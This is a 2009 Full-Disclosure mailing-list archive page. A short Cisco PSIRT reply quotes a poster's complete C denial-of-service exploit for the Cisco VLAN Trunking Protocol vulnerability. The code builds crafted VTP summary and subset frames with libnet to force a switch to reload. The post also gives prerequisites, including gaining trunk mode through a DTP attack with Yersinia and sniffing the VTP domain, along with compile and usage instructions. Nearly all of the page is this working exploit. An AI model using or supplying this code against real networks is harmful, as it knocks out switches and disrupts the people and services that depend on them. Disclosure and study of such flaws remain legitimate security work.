full-disclosure-uk January 2009 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: Re: [Full-disclosure] DoS code for Cisco VLA

Re: [Full-disclosure] DoS code for Cisco VLAN Trunking Protocol Vulnerability

From: Paul Oxman (poxman) <poxman_at_nospam>
Date: Wed Jan 14 2009 - 03:50:38 GMT
To: "showrun.lee" <showrun.lee@gmail.com>, <bugtraq@securityfocus.com>, <full-disclosure@lists.grok.org.uk>

 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,

        This is Paul Oxman with Cisco PSIRT.

        For mitigations and workarounds, please consult the Cisco Security Response available at:
http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml

Regards


From: showrun.lee [mailto:showrun.lee@gmail.com] Sent: Wednesday, January 14, 2009 7:59 AM To: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk Cc: Paul Oxman (poxman)
Subject: DoS code for Cisco VLAN Trunking Protocol Vulnerability /*DoS code for Cisco VLAN Trunking Protocol Vulnerability
*
*vulerability discription:
*http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml
*
*To Known:

  • 1.the switch must in Server/Client Mode.
  • 2.the port ,attacker connected,must be in trunk Mode.
  • Cisco Ethernet ports with no configuration are not
  • in trunk.but trunk mode can be obtained through DTP
  • attack by Yersinia.
  • 3.you must known the vtp domain,this can be sniffed
  • 4.some codes are from Yersinia.
    *
    *Result:
  • switch reload.
    *
    *
    *Compile:
  • gcc -o vtp `libnet-config --libs` vtp.c
    *
    *Usage:vtp -i <interface> -d <vtp_domain>
    *
    *Contact: showrun.lee[AT]gmail.com
    *http://sh0wrun.blogspot.com/
    */
    #include <libnet.h> #include <stdio.h> #include <stdlib.h>

#define VTP_DOMAIN_SIZE 32
#define VTP_TIMESTAMP_SIZE 12

struct vtp_summary { u_int8_t version; u_int8_t code; u_int8_t followers; u_int8_t dom_len; u_int8_t domain[VTP_DOMAIN_SIZE]; u_int32_t revision; u_int32_t updater; u_int8_t timestamp[VTP_TIMESTAMP_SIZE]; u_int8_t md5[16];
};

struct vtp_subset { u_int8_t version; u_int8_t code; u_int8_t seq; u_int8_t dom_len; u_int8_t domain[VTP_DOMAIN_SIZE]; u_int32_t revision;
};

void usage( char *s) {

    printf("%s -i <interface> -d <vtp domain>\n",s);     exit (1);
}

int main( int argc, char *argv[] )
{

    int opt,k=0;
    extern char *optarg;
    libnet_ptag_t t;
    libnet_t *lhandler;
    u_int32_t vtp_len=0, sent;
    struct vtp_summary *vtp_summ;
    struct vtp_subset *vtp_sub; u_int8_t *vtp_packet,*vtp_packet2, *aux; u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 }; u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc }; u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };     struct libnet_ether_addr *mymac;
    char *device;
    char error_information[LIBNET_ERRBUF_SIZE];     char *domain;

// get options while ((opt = getopt(argc, argv, "i:d:")) != -1) { switch (opt) { case 'i': device=malloc(strlen(optarg)); strcpy(device,optarg); k=1; break; case 'd': domain=malloc(strlen(optarg)); strcpy(domain,optarg); break; default: usage(argv[0]); } } if(!k) { printf(" %s -i <interface> -d <vtp domain>\n must assign the interface\n",argv[0]);exit(1);}

//init libnet

    lhandler=libnet_init(LIBNET_LINK,device,error_information);     if (!lhandler) { fprintf(stderr, "libnet_init: %s\n", error_information); return -1; }

    mymac=libnet_get_hwaddr(lhandler);
//build the first packet for vtp_summary

    vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);     vtp_packet = calloc(1,vtp_len);
    aux = vtp_packet;
    memcpy(vtp_packet,cisco_data,sizeof(cisco_data));     aux+=sizeof(cisco_data); vtp_summ = (struct vtp_summary *)aux; vtp_summ->version = 0x01; vtp_summ->code = 0x01;//vtp_summary vtp_summ->followers = 0x01; vtp_summ->dom_len = strlen(domain);
    memcpy(vtp_summ->domain,domain,strlen(domain));     vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok

    t = libnet_build_802_2( 0xaa, /* DSAP */ 0xaa, /* SSAP */ 0x03, /* control */ vtp_packet, /* payload */ vtp_len, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ t = libnet_build_802_3( dst_mac, /* ethernet destination */ mymac->ether_addr_octet, /* ethernet source */ LIBNET_802_2_H + vtp_len, /* frame size */ NULL, /* payload */ 0, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ sent = libnet_write(lhandler); if (sent == -1) { libnet_clear_packet(lhandler); free(vtp_packet); return -1; } libnet_clear_packet(lhandler); //build the second vtp packet for vtp_subset vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset); vtp_packet2 = calloc(1,vtp_len); aux = vtp_packet2; memcpy(vtp_packet2,cisco_data,sizeof(cisco_data)); aux+=sizeof(cisco_data); vtp_sub = (struct vtp_subset *)aux; vtp_sub->version = 0x01; vtp_sub->code = 0x02; //vtp_subset vtp_sub->seq = 0x01; vtp_sub->dom_len = strlen(domain); memcpy(vtp_sub->domain,domain,strlen(domain)); vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok // memcpy(vtp_sub->aaa,aaa,strlen(aaa)); t = libnet_build_802_2( 0xaa, /* DSAP */ 0xaa, /* SSAP */ 0x03, /* control */ vtp_packet2, /* payload */ vtp_len, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ t = libnet_build_802_3( dst_mac, /* ethernet destination */ mymac->ether_addr_octet, /* ethernet source */ LIBNET_802_2_H + vtp_len, /* frame size */ NULL, /* payload */ 0, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ sent = libnet_write(lhandler); if (sent == -1) { libnet_clear_packet(lhandler); free(vtp_packet); return -1; } libnet_clear_packet(lhandler);
}

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBSW1hDvOp/xnPFP7gEQKwFQCfQ32qUNzWFL8dISsQew6+JQAFcnoAnRKq yEEThaENUXT3HaLpVs+mdMHD
=U4Vq
-----END PGP SIGNATURE-----



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/